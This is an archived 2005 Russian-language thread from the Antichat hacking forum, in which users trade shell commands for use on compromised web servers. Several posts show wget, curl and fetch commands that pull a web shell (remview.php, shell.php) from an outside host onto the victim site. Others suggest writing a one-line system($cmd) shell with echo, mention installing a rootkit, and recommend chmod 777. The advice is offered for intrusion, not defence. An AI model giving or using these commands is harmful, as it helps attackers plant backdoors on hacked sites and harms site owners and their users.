Команды. [Архив] - Форум АНТИЧАТ

Просмотр полной версии : Команды.

gangster!

26.04.2005, 16:00

Какие команды можно выполнять на шеллах или найденных уязвимостях ! Допустим я знаю такие команды как pwd , echo , ls -la , wget , cd ,cat.. Но это все команды для листания !! А какими командами можно сливать или заливать файлы на сайт ! Например на некоторых сайтах wget не работает а если я пишу curl -o ./remview.php http://mysite/remview.php то заливается но при попытке обрашения к нему выдает ошибку 302 : Found
The document has moved here (http://mysite/remview.php)

KEZ

26.04.2005, 16:50

Ну тут нужны прямые руки а не банальное знание команд.
Например утилита wget (часто /usr/bin/wget) может скачать по http файл и положить его в папку... Например wget http://.../remview.php -o remview.php
также можно качать файлы lynx'ом (текстовой браузер, мой любимый)
и другими прогами...
/usr/bin/ps пок. список процессов... если тебе нужно поставить хороший руткит, это тоже в аську сдесь долго писать
ещё
можно использовать echo ))

проверь, какие утилиты есть в с-ме: which wget
если все ок, тебе покажут /usr/bin/wget

coyl

26.04.2005, 20:28

да. у меня похожая проблема. КЕЗ, напипши, пожалуйста как посмотреть какие ваще утилиты установленны. например про вгет и кёрл можно узнать через phpinfo()...
И еще у меня конкретный вопрос: на серваке не стоит ни вгет ни кёрл... через чё можно файло закачивать, что стоит в большинстве систем?

Morph

27.04.2005, 06:15

ЭЭЭэ погодите это все конечно хорошо но при чем тут Взлом Форумов?
Переезжаем.

coyl

28.04.2005, 19:39

переехать то переехал, но тему так и не раскрыли =)

Trinux

28.04.2005, 19:47

Я ваще с линуом немного на ВЫ, но когда было дело юзал в оснавном:
wget - заливал (если нет его, то средствами php или mysql, смотря куда есть доступ)
tar, gzip - архиваторы
cp - копирование
chmod - сменить чмод файла
mkdir - создать диру
ну и в остальном всякие типа mysqdump итп, не имеющие отношения к линю. Но чаще всего это cd, cat, ls

BNF

28.04.2005, 20:28

можно ещё такое:

** Записать новую инфу в файл:
echo "my new file content" > file.txt

** Дописать в конец файла:
echo "my add file content" >> file.txt

** Ещё есть замечательная команда: man :D Например:
man lynx ;)

** Запуск какой-то утилиты в фоне (на конце знак бэкграунд процесса):
/usr/bin/some_util &

** Полезная команда смены прав:
chmod 777 file1 file2 file3...

Fan

30.04.2005, 20:02

не понимаю людей короые заливают шелл из одной строчки (system($cmd)) вгетом... а потом кричат что не работает. echo не судьба юзать?

JayTi

16.07.2005, 07:40

wget http://xxxx.xxx/shell.php
curl http://xxxx.xxx/shell.php без всяких -o
fetch http://xxxx.xxx/shell.php - вот была сегодня одна только качалка на сервере